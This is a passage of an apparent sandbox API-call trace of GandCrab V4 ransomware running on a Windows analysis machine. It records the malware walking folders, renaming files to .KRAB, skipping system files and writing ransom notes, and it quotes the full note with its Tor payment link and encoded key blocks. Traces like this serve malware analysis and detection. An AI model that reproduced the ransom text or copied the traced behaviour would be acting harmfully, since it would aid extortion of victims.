JF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0056.797] WriteFile (in: hFile=0x454, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e5a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e5a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0056.798] CloseHandle (hObject=0x454) returned 1 [0056.798] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.798] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.799] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x3, wMilliseconds=0x3e7)) [0056.799] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.799] GetWindowsDirectoryW (in: lpBuffer=0x35f0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0056.799] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x35f0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x35f0600, lpMaximumComponentLength=0x35f0608, lpFileSystemFlags=0x35f0604, lpFileSystemNameBuffer=0x35f0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x35f0600*=0xd2ca4def, lpMaximumComponentLength=0x35f0608*=0xff, lpFileSystemFlags=0x35f0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0056.799] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\d2ca4a08d2ca4dee3d.lock") returned 100 [0056.799] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\flash player\\assetcache\\nahqnpmn\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x454 [0056.800] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.800] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.800] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\") returned 77 [0056.800] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\*" [0056.800] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\*", lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0xfbd820 [0056.801] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.801] FindNextFileW (in: hFindFile=0xfbd820, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0056.801] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0056.801] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.801] FindNextFileW (in: hFindFile=0xfbd820, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0056.801] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0056.801] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0056.801] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\d2ca4a08d2ca4dee3d.lock" [0056.801] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.801] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 105 [0056.801] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\d2ca4a08d2ca4dee3d.lock") returned 100 [0056.801] lstrlenW (lpString=".lock") returned 5 [0056.801] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.802] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".lock ") returned 6 [0056.802] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.802] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.802] FindNextFileW (in: hFindFile=0xfbd820, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0056.802] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0056.802] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0056.802] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\KRAB-DECRYPT.txt" [0056.802] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.803] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\KRAB-DECRYPT.txt.KRAB") returned 98 [0056.803] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\KRAB-DECRYPT.txt") returned 93 [0056.803] lstrlenW (lpString=".txt") returned 4 [0056.803] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.803] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".txt ") returned 5 [0056.803] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.803] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\KRAB-DECRYPT.txt") returned 93 [0056.803] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\KRAB-DECRYPT.txt") returned 93 [0056.803] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0056.804] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0056.804] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0056.804] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0056.804] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0056.804] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0056.804] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0056.804] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0056.804] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0056.804] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0056.804] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.804] FindNextFileW (in: hFindFile=0xfbd820, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0 [0056.804] FindClose (in: hFindFile=0xfbd820 | out: hFindFile=0xfbd820) returned 1 [0056.804] CloseHandle (hObject=0x454) returned 1 [0056.805] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0056.805] FindClose (in: hFindFile=0xfbe0a0 | out: hFindFile=0xfbe0a0) returned 1 [0056.805] CloseHandle (hObject=0x44c) returned 1 [0056.805] FindNextFileW (in: hFindFile=0xfbdce0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0056.805] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0056.805] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0056.805] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\d2ca4a08d2ca4dee3d.lock" [0056.805] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.805] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 85 [0056.806] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\d2ca4a08d2ca4dee3d.lock") returned 80 [0056.806] lstrlenW (lpString=".lock") returned 5 [0056.806] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.806] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".lock ") returned 6 [0056.806] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.806] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.806] FindNextFileW (in: hFindFile=0xfbdce0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0056.806] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0056.807] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0056.807] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\KRAB-DECRYPT.txt" [0056.807] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.807] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\KRAB-DECRYPT.txt.KRAB") returned 78 [0056.807] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\KRAB-DECRYPT.txt") returned 73 [0056.807] lstrlenW (lpString=".txt") returned 4 [0056.807] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.807] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".txt ") returned 5 [0056.807] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.808] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\KRAB-DECRYPT.txt") returned 73 [0056.808] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\KRAB-DECRYPT.txt") returned 73 [0056.808] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0056.808] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0056.808] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0056.808] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0056.808] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0056.808] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0056.808] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0056.808] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0056.808] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0056.809] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0056.809] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.809] FindNextFileW (in: hFindFile=0xfbdce0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0056.809] lstrcmpW (lpString1="NativeCache", lpString2=".") returned 1 [0056.809] lstrcmpW (lpString1="NativeCache", lpString2="..") returned 1 [0056.809] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\", lpString2="NativeCache" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache" [0056.809] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\" [0056.809] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0056.809] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0056.809] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0056.809] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0056.810] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0056.810] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.810] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.810] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\\\KRAB-DECRYPT.txt") returned 86 [0056.810] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\flash player\\nativecache\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0056.847] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0056.847] WriteFile (in: hFile=0x44c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0056.848] CloseHandle (hObject=0x44c) returned 1 [0056.849] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.849] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.849] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x4, wMilliseconds=0x2e)) [0056.849] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.850] GetWindowsDirectoryW (in: lpBuffer=0x35f0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0056.850] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x35f0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x35f0600, lpMaximumComponentLength=0x35f0608, lpFileSystemFlags=0x35f0604, lpFileSystemNameBuffer=0x35f0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x35f0600*=0xd2ca4def, lpMaximumComponentLength=0x35f0608*=0xff, lpFileSystemFlags=0x35f0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0056.850] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\d2ca4a08d2ca4dee3d.lock") returned 92 [0056.850] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\flash player\\nativecache\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x44c [0056.866] VirtualFree 